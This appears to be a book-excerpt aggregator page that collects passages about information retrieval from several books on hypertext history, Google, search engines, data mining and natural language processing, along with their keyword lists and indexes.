“Physical Context for Just-in-Time Information Retrieval.” IEEE Transactions on Computers 52, no. 8 (August): 1011-14. ———. 1997. “The Wearable Remembrance Agent: A System for Augmented Memory.” Special Issue on Wearable Computing, Personal Technologies Journal 1:218-24. Rhodes, Bradley J. “Margin Notes: Building a Contextually Aware Associative Memory” (html), to appear in The Proceedings of the International Conference on Intelligent User Interfaces (IUI ’00), New Orleans, Louisiana, January 9-12, 2000. Rhodes, Bradley, and Pattie Maes. 2000. “Just-in-Time Information Retrieval Agents.” Special issue on the MIT Media Laboratory, IBM Systems Journal 39, nos. 3 and 4: 685-704. Rhodes, Bradley, and Thad Starner. “The Remembrance Agent: A Continuously Running Automated Information Retrieval System.” The Proceedings of the First International Conference on the Practical Application of Intelligent Agents and Multi Agent Technology (PAAM ’96), London, UK, April 1996, 487-95.

Ellis. “Multimodal Segmentation of Lifelog Data.” Eighth RIAO Conference—Large-Scale Semantic Access to Content (Text, Image, Video and Sound), Pittsburgh, Pennsylvania, May 30-June 1, 2007. Lee, Hyowon, Alan F. Smeaton, Noel E. O’Connor, and Gareth J. F. Jones. “Adaptive Visual Summary of LifeLog Photos for Personal Information Management.” AIR 2006—First International Workshop on Adaptive Information Retrieval, Glasgow, UK, October 14, 2006. O’Conaire, C., N. O’Connor, A. F. Smeaton, and G. Jones. “Organizing a Daily Visual Diary Using Multi-Feature Clustering.” SPIE Electronic Imaging—Multimedia Content Access: Algorithms and Systems (EI121), San Jose, California, January 28-February 1, 2007. Smeaton, A. F. “Content vs. Context for Multimedia Semantics: The Case of SenseCam Image Structuring.”


pages: 193 words: 19,478

Memory Machines: The Evolution of Hypertext by Belinda Barnet

augmented reality, Benoit Mandelbrot, Bill Duvall, British Empire, Buckminster Fuller, Claude Shannon: information theory, collateralized debt obligation, computer age, conceptual framework, Douglas Engelbart, Douglas Engelbart, game design, hiring and firing, Howard Rheingold, HyperCard, hypertext link, information retrieval, Internet Archive, John Markoff, linked data, mandelbrot fractal, Marshall McLuhan, Menlo Park, nonsequential writing, Norbert Wiener, publish or perish, Robert Metcalfe, semantic web, Steve Jobs, Stewart Brand, technoutopianism, Ted Nelson, the scientific method, Vannevar Bush, wikimedia commons

Engelbart, however, believes that his paper failed not for lack of prototypes but because the institution of computing science at the time ‘kept trying to fit [his] ideas into the existing paradigm’, claiming that he should just ‘join their forefront problem pursuits’ and stop setting himself apart with far-flung augmentation babble (Engelbart 1988, 190). He protested that he was doing neither ‘information retrieval’ nor ‘electrical engineering’, but a new thing somewhere in between, and that it should be recognized as a new field of research. In our interview he remembered that: After I’d given a talk at Stanford, [three angry guys] got me later outside at a table. They said, ‘All you’re talking about is information retrieval.’ I said no. They said, ‘YES, it is, we’re professionals and we know, so we’re telling you don’t know enough so stay out of it, ’cause goddamit, you’re bollocksing it all up. You’re in engineering, not information retrieval.’ (Engelbart 1999) Computers, in large part, were still seen as number crunchers, and computer engineers had no business talking about psychology and the human beings who used these machines.

In making this passage, however, Engelbart also fell into a kind of failure, at least by the common understanding of an engineer’s calling in the national security state. As Engelbart told the author of this book in 1999, he was often told to mind his own business and keep off well-defined turf: After I’d given a talk at Stanford, [three angry guys] got me later outside at a table. They said, ‘All you’re talking about is information retrieval.’ I said no. They said, ‘YES, it is, we’re professionals and we know, so we’re telling you don’t know enough so stay out of it, ’cause goddamit, you’re bollocksing it all up. You’re in engineering, not information retrieval.’ (Engelbart 1999) My hero; the man who never knew too much about disciplinary confines, professional flocking rules and the mere retrieval of information; the man who straps bricks to pencils, who annoys the specialists, who insists on bollocksing up the computer world in all kinds of fascinating ways.

Gleick quotes a rather different assessment of Babbage from an early twentieth-century edition of the Dictionary of National Biography: Mathematician and scientific mechanician […] obtained government grant for making a calculating machine […] but the work of construction ceased, owing to disagreements with the engineer; offered the government an improved design, which was refused on grounds of expense […] Lucasian professor of mathematics, Cambridge, but delivered no lectures. (Cited in Gleick 2011, 121) In the words of the information retrievers, Babbage seems a resounding failure, no matter if he did (undeservedly, according to the insinuation) have Newton’s chair. Perhaps biography does not belong in dictionaries. Among other blessings that came to Babbage was one of the great friendships in intellectual history, with Augusta Ada King, Countess Lovelace. She also fell into obscurity for nearly a century after her death, but is now remembered as prodigy and prophet, the first lady of computing.


pages: 666 words: 181,495

In the Plex: How Google Thinks, Works, and Shapes Our Lives by Steven Levy

23andMe, AltaVista, Anne Wojcicki, Apple's 1984 Super Bowl advert, autonomous vehicles, book scanning, Brewster Kahle, Burning Man, business process, clean water, cloud computing, crowdsourcing, Dean Kamen, discounted cash flows, don't be evil, Donald Knuth, Douglas Engelbart, Douglas Engelbart, El Camino Real, fault tolerance, Firefox, Gerard Salton, Gerard Salton, Google bus, Google Chrome, Google Earth, Googley, HyperCard, hypertext link, IBM and the Holocaust, informal economy, information retrieval, Internet Archive, Jeff Bezos, John Markoff, Kevin Kelly, Kickstarter, Mark Zuckerberg, Menlo Park, one-China policy, optical character recognition, PageRank, Paul Buchheit, Potemkin village, prediction markets, recommendation engine, risk tolerance, Rubik’s Cube, Sand Hill Road, Saturday Night Live, search inside the book, second-price auction, selection bias, Silicon Valley, skunkworks, Skype, slashdot, social graph, social software, social web, spectrum auction, speech recognition, statistical model, Steve Ballmer, Steve Jobs, Steven Levy, Ted Nelson, telemarketer, trade route, traveling salesman, turn-by-turn navigation, undersea cable, Vannevar Bush, web application, WikiLeaks, Y Combinator

When DEC opened it to outsiders on December 15, 1995, nearly 300,000 people tried it out. They were dazzled. AltaVista’s actual search quality techniques—what determined the ranking of results—were based on traditional information retrieval (IR) algorithms. Many of those algorithms arose from the work of one man, a refugee from Nazi Germany named Gerard Salton, who had come to America, got a PhD at Harvard, and moved to Cornell University, where he cofounded its computer science department. Searching through databases using the same commands you’d use with a human—“natural language” became the term of art—was Salton’s specialty. During the 1960s, Salton developed a system that was to become a model for information retrieval. It was called SMART, supposedly an acronym for “Salton’s Magical Retriever of Text.” The system established many conventions that still persist in search, including indexing and relevance algorithms.

Fortunately, Page’s visions extended to the commercial: “Probably from when I was twelve, I knew I was going to start a company eventually,” he’d later say. Page’s brother, nine years older, was already in Silicon Valley, working for an Internet start-up. Page chose to work in the department’s Human-Computer Interaction Group. The subject would stand Page in good stead in the future with respect to product development, even though it was not in the HCI domain to figure out a new model of information retrieval. On his desk and permeating his conversations was Apple interface guru Donald Norman’s classic tome The Psychology of Everyday Things, the bible of a religion whose first, and arguably only, commandment is “The user is always right.” (Other Norman disciples, such as Jeff Bezos at Amazon.com, were adopting this creed on the web.) Another influential book was a biography of Nikola Tesla, the brilliant Serb scientist; though Tesla’s contributions arguably matched Thomas Edison’s—and his ambitions were grand enough to impress even Page—he died in obscurity.

A key designer was Louis Monier, a droll Frenchman and idealistic geek who had come to America with a doctorate in 1980. DEC had been built on the minicomputer, a once innovative category now rendered a dinosaur by the personal computer revolution. “DEC was very much living in the past,” says Monier. “But they had small groups of people who were very forward-thinking, experimenting with lots of toys.” One of those toys was the web. Monier himself was no expert in information retrieval but a big fan of data in the abstract. “To me, that was the secret—data,” he says. What the data was telling him was that if you had the right tools, it was possible to treat everything in the open web like a single document. Even at that early date, the basic building blocks of web search had been already set in stone. Search was a four-step process. First came a sweeping scan of all the world’s web pages, via a spider.


pages: 1,085 words: 219,144

Solr in Action by Trey Grainger, Timothy Potter

business intelligence, cloud computing, commoditize, conceptual framework, crowdsourcing, data acquisition, en.wikipedia.org, failed state, fault tolerance, finite state, full text search, glass ceiling, information retrieval, natural language processing, openstreetmap, performance metric, premature optimization, recommendation engine, web application

To begin, we need to know how Solr matches home listings in the index to queries entered by users, as this is the basis for all search applications. 1.2.1. Information retrieval engine Solr is built on Apache Lucene, a popular, Java-based, open source, information retrieval library. We’ll save a detailed discussion of what information retrieval is for chapter 3. For now, we’ll touch on the key concepts behind information retrieval, starting with the formal definition taken from one of the prominent academic texts on modern search concepts: Information retrieval (IR) is finding material (usually documents) of an unstructured nature (usually text) that satisfies an information need from within large collections (usually stored on computers).[1] 1 Christopher D. Manning, Prabhakar Raghavan, and Hinrich Schütze, Introduction to Information Retrieval (Cambridge University Press, 2008). In our example real estate application, the user’s primary need is finding a home to purchase based on location, home style, features, and price.

The key data structure supporting information retrieval is the inverted index. You’ll learn all about how an inverted index works in chapter 3. For now, it’s sufficient to review figure 1.2 to get a feel for what happens when a new document (#44 in the diagram) is added to the index and how documents are matched to query terms using the inverted index. You might be thinking that a relational database could easily return the same results using an SQL query, which is true for this simple example. But one key difference between a Lucene query and a database query is that in Lucene results are ranked by their relevance to a query, and database results can only be sorted by one or more of the table columns. In other words, ranking documents by relevance is a key aspect of information retrieval and helps differentiate it from other types of queries.
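The term-to-documents matching described above can be sketched in a few lines of Python. This is a toy illustration of the inverted-index idea, not Lucene's actual implementation; the home-listing documents, their text, and the document IDs here are invented for the example (only ID 44 echoes the diagram), and it ranks nothing, performing only boolean AND matching:

```python
from collections import defaultdict

def build_index(docs):
    # Inverted index: each term maps to the set of document IDs containing it.
    index = defaultdict(set)
    for doc_id, text in docs.items():
        for term in text.lower().split():
            index[term].add(doc_id)
    return index

def search(index, query):
    # Return IDs of documents containing every query term (boolean AND).
    terms = query.lower().split()
    if not terms:
        return set()
    result = set(index.get(terms[0], set()))
    for term in terms[1:]:
        result &= index.get(term, set())
    return result

docs = {
    41: "two bedroom home with garage",
    42: "three bedroom home near lake",
    44: "lakefront home with boat dock",
}
index = build_index(docs)
print(sorted(search(index, "bedroom home")))  # -> [41, 42]
```

A real engine stores postings in sorted, compressed lists and attaches term statistics to each entry so that matches can then be scored by relevance, which is the key difference from the SQL comparison made above.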

IBSimilarity class ICUFoldingFilterFactory idf (inverse document frequency), 2nd, 3rd, 4th if function implicit routing importing documents common formats DIH ExtractingRequestHandler Nutch relational database data using JSON using SolrJ library using XML Inactive state incremental indexing indent parameter indexlog utility IndicNormalizationFilterFactory Indonesian language IndonesianStemFilterFactory information discovery use case information retrieval. See IR. installing Solr instanceDir parameter <int> element Integrated Development Environment. See IDE. IntelliJ IDEA internationalization. See multilingual search. Intersects operation invalidating cached objects invariants section inverse document frequency. See idf. inverted index ordering of terms overview IR (information retrieval) Irish language IrishLowerCaseFilterFactory, 2nd IsDisjointTo operation IsWithin operation Italian language ItalianLightStemFilterFactory J J2EE (Java 2 Platform, Enterprise Edition) Japanese language, 2nd JapaneseBaseFormFilterFactory JapaneseKatakanaStemFilterFactory JapaneseTokenizerFactory JAR files Java 2 Platform, Enterprise Edition.


pages: 541 words: 109,698

Mining the Social Web: Finding Needles in the Social Haystack by Matthew A. Russell

Climategate, cloud computing, crowdsourcing, en.wikipedia.org, fault tolerance, Firefox, full text search, Georg Cantor, Google Earth, information retrieval, Mark Zuckerberg, natural language processing, NP-complete, Saturday Night Live, semantic web, Silicon Valley, slashdot, social graph, social web, statistical model, Steve Jobs, supply-chain management, text mining, traveling salesman, Turing test, web application

Text Mining Fundamentals Although rigorous approaches to natural language processing (NLP) that include such things as sentence segmentation, tokenization, word chunking, and entity detection are necessary in order to achieve the deepest possible understanding of textual data, it’s helpful to first introduce some fundamentals from Information Retrieval theory. The remainder of this chapter introduces some of its more foundational aspects, including TF-IDF, the cosine similarity metric, and some of the theory behind collocation detection. Chapter 8 provides a deeper discussion of NLP. Note If you want to dig deeper into IR theory, the full text of Introduction to Information Retrieval is available online and provides more information than you could ever want to know about the field. A Whiz-Bang Introduction to TF-IDF Information retrieval is an extensive field with many specialties. This discussion narrows in on TF-IDF, one of the most fundamental techniques for retrieving relevant documents from a corpus.
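The TF-IDF weighting introduced above can be shown in a minimal sketch. This uses the plain, unsmoothed formulation (tf × log(N/df)); real IR libraries typically apply smoothing and normalization, and the three-document corpus here is invented for illustration:

```python
import math

# Toy corpus, tokenized by whitespace.
corpus = [
    "the quick brown fox",
    "the lazy dog",
    "the quick dog barks",
]
docs = [doc.split() for doc in corpus]
n_docs = len(docs)

def tf(term, doc):
    # Term frequency: raw count of the term in one document.
    return doc.count(term)

def idf(term):
    # Inverse document frequency: log of (total docs / docs containing term).
    df = sum(1 for doc in docs if term in doc)
    return math.log(n_docs / df) if df else 0.0

def tf_idf(term, doc):
    return tf(term, doc) * idf(term)

print(round(tf_idf("quick", docs[0]), 3))  # -> 0.405
```

Note that a term appearing in every document ("the") gets an IDF of log(1) = 0, so it contributes nothing to relevance, which is exactly the stop-word-damping behavior the chapter goes on to exploit.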

I identity consolidation, Brief analysis of breadth-first techniques IDF (inverse document frequency), A Whiz-Bang Introduction to TF-IDF, A Whiz-Bang Introduction to TF-IDF (see also TF-IDF) calculation of, A Whiz-Bang Introduction to TF-IDF idf function, A Whiz-Bang Introduction to TF-IDF IETF OAuth 2.0 protocol, No, You Can’t Have My Password IMAP (Internet Message Access Protocol), Analyzing Your Own Mail Data, Accessing Gmail with OAuth, Fetching and Parsing Email Messages connecting to, using OAuth, Accessing Gmail with OAuth constructing an IMAP query, Fetching and Parsing Email Messages imaplib, Fetching and Parsing Email Messages ImportError, Installing Python Development Tools indexing function, JavaScript-based, couchdb-lucene: Full-Text Indexing and More inference, Open-World Versus Closed-World Assumptions, Inferencing About an Open World with FuXi application to machine knowledge, Inferencing About an Open World with FuXi in logic-based programming languages and RDF, Open-World Versus Closed-World Assumptions influence, measuring for Twitter users, Measuring Influence, Measuring Influence, Measuring Influence, Measuring Influence calculating Twitterer’s most popular followers, Measuring Influence crawling friends/followers connections, Measuring Influence Infochimps, Strong Links API, The Infochimps “Strong Links” API, Interactive 3D Graph Visualization information retrieval industry, Before You Go Off and Try to Build a Search Engine… information retrieval theory, Text Mining Fundamentals (see IR theory) intelligent clustering, Intelligent clustering enables compelling user experiences interactive 3D graph visualization, Interactive 3D Graph Visualization interactive 3D tag clouds for tweet entities co-occurring with #JustinBieber and #TeaParty, Visualizing Tweets with Tricked-Out Tag Clouds interpreter, Python (IPython), Closing Remarks intersection operations, Elementary Set Operations, How Much Overlap Exists Between the Entities of #TeaParty and 
#JustinBieber Tweets?

For comparative purposes, note that it’s certainly possible to perform text-based indexing by writing a simple mapping function that associates keywords and documents, like the one in Example 3-10.

Example 3-10. A mapper that tokenizes documents

def tokenizingMapper(doc):
    tokens = doc.split()
    for token in tokens:
        if isInteresting(token):  # Filter out stop words, etc.
            yield token, doc

However, you’ll quickly find that you need to do a lot more homework about basic Information Retrieval (IR) concepts if you want to establish a good scoring function to rank documents by relevance or anything beyond basic frequency analysis. Fortunately, the benefits of Lucene are many, and chances are good that you’ll want to use couchdb-lucene instead of writing your own mapping function for full-text indexing. Note Unlike the previous sections that opted to use the couchdb module, this section uses httplib to exercise CouchDB’s REST API directly and includes view functions written in JavaScript.


pages: 721 words: 197,134

Data Mining: Concepts, Models, Methods, and Algorithms by Mehmed Kantardzić

Albert Einstein, bioinformatics, business cycle, business intelligence, business process, butter production in bangladesh, combinatorial explosion, computer vision, conceptual framework, correlation coefficient, correlation does not imply causation, data acquisition, discrete time, El Camino Real, fault tolerance, finite state, Gini coefficient, information retrieval, Internet Archive, inventory management, iterative process, knowledge worker, linked data, loose coupling, Menlo Park, natural language processing, Netflix Prize, NP-complete, PageRank, pattern recognition, peer-to-peer, phenotype, random walk, RFID, semantic web, speech recognition, statistical model, Telecommunications Act of 1996, telemarketer, text mining, traveling salesman, web application

The paper presents the taxonomy of clustering techniques and identifies crosscutting themes, recent advances, and some important applications. For readers interested in practical implementation of some clustering methods, the paper offers useful advice and a large spectrum of references. Miyamoto, S., Fuzzy Sets in Information Retrieval and Cluster Analysis, Kluwer Academic Publishers, Dordrecht, The Netherlands, 1990. This book offers an in-depth presentation and analysis of some clustering algorithms and reviews the possibilities of combining these techniques with fuzzy representation of data. Information retrieval, which, with the development of advanced Web-mining techniques, is becoming more important in the data-mining community, is also explained in the book. 10 ASSOCIATION RULES Chapter Objectives Explain the local modeling character of association-rule techniques.

Any researcher or practitioner in this field needs to be aware of these issues in order to successfully apply a particular methodology, to understand a method’s limitations, or to develop new techniques. This book is an attempt to present and discuss such issues and principles and then describe representative and popular methods originating from statistics, machine learning, computer graphics, data bases, information retrieval, neural networks, fuzzy logic, and evolutionary computation. In this book, we describe how best to prepare environments for performing data mining and discuss approaches that have proven to be critical in revealing important patterns, trends, and models in large data sets. It is our expectation that once a reader has completed this text, he or she will be able to initiate and perform basic activities in all phases of a data mining process successfully and effectively.

This, in general, requires computing the distance of the unlabeled object to all the objects in the labeled set, which can be expensive particularly for large training sets. Among the various methods of supervised learning, the nearest neighbor classifier achieves consistently high performance, without a priori assumptions about the distributions from which the training examples are drawn. The reader may have noticed the similarity between the problem of finding nearest neighbors for a test sample and ad hoc retrieval methodologies. In standard information retrieval systems such as digital libraries or web search, we search for the documents (samples) with the highest similarity to the query document represented by a set of key words. Problems are similar, and often the proposed solutions are applicable in both disciplines. Decision boundaries in 1NN are concatenated segments of the Voronoi diagram as shown in Figure 4.28. The Voronoi diagram decomposes space into Voronoi cells, where each cell consists of all points that are closer to the sample than to other samples.
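The brute-force computation described above (distance from the unlabeled object to every labeled object) can be sketched directly. This is a toy 1NN classifier with an invented two-dimensional training set; it makes no claim about the book's own examples and uses plain Euclidean distance:

```python
import math

def nearest_neighbor(query, labeled):
    # labeled: list of (point, label) pairs; point is a tuple of floats.
    # Scan every training sample -- O(n) per query, the cost noted above.
    best_label, best_dist = None, float("inf")
    for point, label in labeled:
        dist = math.dist(query, point)  # Euclidean distance (Python 3.8+)
        if dist < best_dist:
            best_dist, best_label = dist, label
    return best_label

training = [((0.0, 0.0), "A"), ((1.0, 1.0), "A"), ((5.0, 5.0), "B")]
print(nearest_neighbor((0.5, 0.5), training))  # -> A
```

The decision regions this induces are exactly the Voronoi cells of the training points mentioned in the text: every query falling in a sample's cell receives that sample's label.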


pages: 481 words: 121,669

The Invisible Web: Uncovering Information Sources Search Engines Can't See by Gary Price, Chris Sherman, Danny Sullivan

AltaVista, American Society of Civil Engineers: Report Card, bioinformatics, Brewster Kahle, business intelligence, dark matter, Donald Davies, Douglas Engelbart, Douglas Engelbart, full text search, HyperCard, hypertext link, information retrieval, Internet Archive, joint-stock company, knowledge worker, natural language processing, pre–internet, profit motive, publish or perish, search engine result page, side project, Silicon Valley, speech recognition, stealth mode startup, Ted Nelson, Vannevar Bush, web application

Despite this increased accessibility, the Internet was still primarily a tool for academics and government contractors well into the early 1990s. As more and more computers connected to the Internet, users began to demand tools that would allow them to search for and locate text and other files on computers anywhere on the Net. Early Net Search Tools Although sophisticated search and information retrieval techniques date back to the late 1950s and early ‘60s, these techniques were used primarily in closed or proprietary systems. Early Internet search and retrieval tools lacked even the most basic capabilities, primarily because it was thought that traditional information retrieval techniques would not work well on an open, unstructured information universe like the Internet. Accessing a file on the Internet was a two-part process. First, you needed to establish direct connection to the remote computer where the file was located using a terminal emulation program called Telnet.

But they relied on Web page authors to submit information, and the Web’s relentless growth rate ultimately made it impossible to keep the lists either current or comprehensive. What was needed was an automated approach to Web page discovery and indexing. The Web had now grown large enough that information scientists became interested in creating search services specifically for the Web. Sophisticated information retrieval techniques had been available since the early 1960s, but they were only effective when searching closed, relatively structured databases. The open, laissez-faire nature of the Web made it too messy to easily adapt traditional information retrieval techniques. New, Web-centric approaches were needed. But how best to approach the problem? Web search would clearly have to be more sophisticated than a simple Archie-type service. But should these new “search engines” attempt to index the full text of Web documents, much as earlier Gopher tools had done, or simply broker requests to local Web search services on individual computers, following the WAIS model?

The First Search Engines Tim Berners-Lee’s vision of the Web was of an information space where data of all types could be freely accessed. But in the early days of the Web, the reality was that most of the Web consisted of simple HTML text documents. Since few servers offered local site search services, developers of the first Web search engines opted for the model of indexing the full text of pages stored on Web servers. To adapt traditional information retrieval techniques to Web search, they built huge databases that attempted to replicate the Web, searching over these relatively controlled, closed archives of pages rather than trying to search the Web itself in real time. With this fateful architectural decision, limiting search engines to HTML text documents and essentially ignoring all other types of data available via the Web, the Invisible Web was born.


pages: 504 words: 89,238

Natural language processing with Python by Steven Bird, Ewan Klein, Edward Loper

bioinformatics, business intelligence, conceptual framework, Donald Knuth, elephant in my pajamas, en.wikipedia.org, finite state, Firefox, Guido van Rossum, information retrieval, Menlo Park, natural language processing, P = NP, search inside the book, speech recognition, statistical model, text mining, Turing test

This can be broken down into two subtasks: identifying the boundaries of the NE, and identifying its type. While named entity recognition is frequently a prelude to identifying relations in Information Extraction, it can also contribute to other tasks. For example, in Question Answering (QA), we try to improve the precision of Information Retrieval by recovering not whole pages, but just those parts which contain an answer to the user’s question. Most QA systems take the documents returned by standard Information Retrieval, and then attempt to isolate the minimal text snippet in the document containing the answer. Now suppose the question was Who was the first President of the US?, and one of the documents that was retrieved contained the following passage: (5) The Washington Monument is the most prominent structure in Washington, D.C. and one of the city’s early attractions.

[General Index of the book (pp. 466–479), flattened by text extraction; omitted here.]

About the Authors: Steven Bird is Associate Professor in the Department of Computer Science and Software Engineering at the University of Melbourne, and Senior Research Associate in the Linguistic Data Consortium at the University of Pennsylvania.

Other useful books in this area include (Biber, Conrad, & Reppen, 1998), (McEnery, 2006), (Meyer, 2002), (Sampson & McCarthy, 2005), and (Scott & Tribble, 2006). Further readings in quantitative data analysis in linguistics are: (Baayen, 2008), (Gries, 2009), and (Woods, Fletcher, & Hughes, 1986). The original description of WordNet is (Fellbaum, 1998). Although WordNet was originally developed for research in psycholinguistics, it is now widely used in NLP and Information Retrieval. WordNets are being developed for many other languages, as documented at http://www.globalwordnet.org/. For a study of WordNet similarity measures, see (Budanitsky & Hirst, 2006). Other topics touched on in this chapter were phonetics and lexical semantics, and we refer readers to Chapters 7 and 20 of (Jurafsky & Martin, 2008). 2.8 Exercises 1. ○ Create a variable phrase containing a list of words.


Bootstrapping: Douglas Engelbart, Coevolution, and the Origins of Personal Computing (Writing Science) by Thierry Bardini

Apple II, augmented reality, Bill Duvall, conceptual framework, Donald Davies, Douglas Engelbart, Dynabook, experimental subject, Grace Hopper, hiring and firing, hypertext link, index card, information retrieval, invention of hypertext, Jaron Lanier, Jeff Rulifson, John von Neumann, knowledge worker, Leonard Kleinrock, Menlo Park, Mother of all demos, new economy, Norbert Wiener, Norman Mailer, packet switching, QWERTY keyboard, Ralph Waldo Emerson, RAND corporation, RFC: Request For Comment, Sapir-Whorf hypothesis, Silicon Valley, Steve Crocker, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, stochastic process, Ted Nelson, the medium is the message, theory of mind, Turing test, unbiased observer, Vannevar Bush, Whole Earth Catalog

The regnant term at the time for what Bush was proposing was indeed "information retrieval," and Engelbart himself has testified to the power that a preconceived notion of information retrieval held for creating misunderstanding of his work on hypertext networks: I started trying to reach out to make connections in domains of interest and concerns out there that fit along the vector I was interested in. I went to the information retrieval people. I remember one instance when I went to the Ford Foundation's Center for Advanced Study in Social Sciences to see somebody who was there for a year, who was into information retrieval. We sat around. In fact, at coffee break, there were about five people sitting there. I was trying to explain what I wanted to do and one guy just kept telling me, "You are just giving fancy names to information retrieval. Why do that? Why don't you just admit that it's information retrieval and get on with the rest of it and make it all work?"

Why don't you just admit that it's information retrieval and get on with the rest of it and make it all work?" He was getting kind of nasty. The other guy was trying to get him to back off. (Engelbart 1996) It seems difficult to dispute, therefore, that the Memex was not conceived as a medium, only as a personal "tool" for information retrieval. Personal access to information was emphasized over communication. The later research of Ted Nelson on hypertext is very representative of that emphasis. It is problematic, however, to grant Bush the status of the "unique forefather" of computerized hypertext systems. The situation is more complicated than that. For the development of hypertext, the important distinction is not between personal access to information and communication, but between different conceptions of what communication could mean, and there were in fact two different approaches to communication at the origin of current hypertext and hypermedia systems.

The second is represented by Douglas Engelbart and his NLS, as his oN-Line System was called, which was conceived as a way to support group collaboration. The difference in objectives signals the difference in means that characterized the two approaches. The first revolved around the "association" of ideas on the model of how the individual mind is supposed to work. The second revolved around the intersubjective "connection" of words in the systems of natural languages. What actually differentiates hypertext systems from information-retrieval systems is not the process of "association," the term Bush proposed as analogous to the way the individual mind works. Instead, what constitutes a hypertext system is clear in the definition of hypertext already cited: "a style of building systems for information representation and management around a network of nodes connected together by typed links." A hypertext system is constituted by the presence of "links."


pages: 502 words: 107,510

Natural Language Annotation for Machine Learning by James Pustejovsky, Amber Stubbs

Amazon Mechanical Turk, bioinformatics, cloud computing, computer vision, crowdsourcing, easy for humans, difficult for computers, finite state, game design, information retrieval, iterative process, natural language processing, pattern recognition, performance metric, sentiment analysis, social web, speech recognition, statistical model, text mining

Timeline of Corpus Linguistics Here's a quick overview of some of the milestones in the field, leading up to where we are now. 1950s: Descriptive linguists compile collections of spoken and written utterances of various languages from field research. Literary researchers begin compiling systematic collections of the complete works of different authors. Key Word in Context (KWIC) is invented as a means of indexing documents and creating concordances. 1960s: Kucera and Francis publish A Standard Corpus of Present-Day American English (the Brown Corpus), the first broadly available large corpus of language texts. Work in Information Retrieval (IR) develops techniques for statistical similarity of document content. 1970s: Stochastic models developed from speech corpora make Speech Recognition systems possible. The vector space model is developed for document indexing. The London-Lund Corpus (LLC) is developed through the work of the Survey of English Usage. 1980s: The Lancaster-Oslo-Bergen (LOB) Corpus, designed to match the Brown Corpus in terms of size and genres, is compiled.

They are also used in speech disambiguation—if a person speaks unclearly but utters a sequence that does not commonly (or ever) occur in the language being spoken, an n-gram model can help recognize that problem and find the words that the speaker probably intended to say. Another modern corpus is ClueWeb09 (http://lemurproject.org/clueweb09.php/), a dataset “created to support research on information retrieval and related human language technologies. It consists of about 1 billion web pages in ten languages that were collected in January and February 2009.” This corpus is too large to use for an annotation project (it’s about 25 terabytes uncompressed), but some projects have taken parts of the dataset (such as a subset of the English websites) and used them for research (Pomikálek et al. 2012).

So the first word in the ranking occurs about twice as often as the second word in the ranking, and three times as often as the third word in the ranking, and so on. N-grams In this section we introduce the notion of an n-gram. N-grams are important for a wide range of applications in Natural Language Processing (NLP), because fairly straightforward language models can be built using them, for speech, Machine Translation, indexing, Information Retrieval (IR), and, as we will see, classification. Imagine that we have a string of tokens, W, consisting of the elements w1, w2, … , wn. Now consider a sliding window over W. If the sliding window consists of one cell (wi), then the collection of one-cell substrings is called the unigram profile of the string; there will be as many unigram profiles as there are elements in the string. Consider now all two-cell substrings, where we look at w1 w2, w2 w3, and so forth, to the end of the string, wn–1 wn.
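The sliding-window construction just described can be sketched in a few lines of Python (the function name is ours, for illustration):

```python
def ngrams(tokens, n):
    """Collect all n-cell substrings of W by sliding an n-wide window."""
    return [tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]

w = ["w1", "w2", "w3", "w4"]
unigrams = ngrams(w, 1)  # one per element: ('w1',), ('w2',), ...
bigrams = ngrams(w, 2)   # ('w1', 'w2'), ('w2', 'w3'), ('w3', 'w4')
print(bigrams)
```

For a string of n tokens there are n unigrams and n - 1 bigrams, which is why the two-cell windows run from w1 w2 only up to wn-1 wn.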


pages: 392 words: 108,745

Talk to Me: How Voice Computing Will Transform the Way We Live, Work, and Think by James Vlahos

Albert Einstein, AltaVista, Amazon Mechanical Turk, Amazon Web Services, augmented reality, Automated Insights, autonomous vehicles, Chuck Templeton: OpenTable:, cloud computing, computer age, Donald Trump, Elon Musk, information retrieval, Internet of things, Jacques de Vaucanson, Jeff Bezos, lateral thinking, Loebner Prize, Machine translation of "The spirit is willing, but the flesh is weak." to Russian and back, Mark Zuckerberg, Menlo Park, natural language processing, PageRank, pattern recognition, Ponzi scheme, randomized controlled trial, Ray Kurzweil, Ronald Reagan, Rubik’s Cube, self-driving car, sentiment analysis, Silicon Valley, Skype, Snapchat, speech recognition, statistical model, Steve Jobs, Steve Wozniak, Steven Levy, Turing test, Watson beat the top human players on Jeopardy!

But this technique is laborious and limited to the narrow pool of conversational situations designers imagine in advance. A more scalable technique is information retrieval, or IR, in which the AI grabs a suitable response from a database or web page. Because there’s so much content online, IR gives machines vastly more to say than if they were limited to hand-authored utterances. The technique can also be combined with the scripted approach, filling blanks within prewritten templates. For instance, responding to a question about the weather, a voice assistant might say, “It’ll be sunny with a high of 78. Looks like a great day to go outside!” In that case, the specifics (“sunny,” “78”) were retrieved from a weather service while the surrounding words (“great day to go outside”) were manually authored as reusable boilerplate. Voice AI creators use information retrieval more than any other technique, and IR will pop up again later in this book.
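The hybrid pattern in the weather example can be sketched as follows; the lookup function and template text are illustrative stand-ins, not any real assistant's code:

```python
def get_forecast():
    # Stand-in for the information-retrieval step: in a real assistant
    # these specifics would come from a weather service.
    return {"condition": "sunny", "high": 78}

# Hand-authored boilerplate with blanks for the retrieved specifics.
TEMPLATE = ("It'll be {condition} with a high of {high}. "
            "Looks like a great day to go outside!")

def respond():
    return TEMPLATE.format(**get_forecast())

print(respond())
```

The retrieved values fill the blanks while the surrounding sentence stays fixed, which is exactly why the approach scales better than authoring every utterance by hand.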

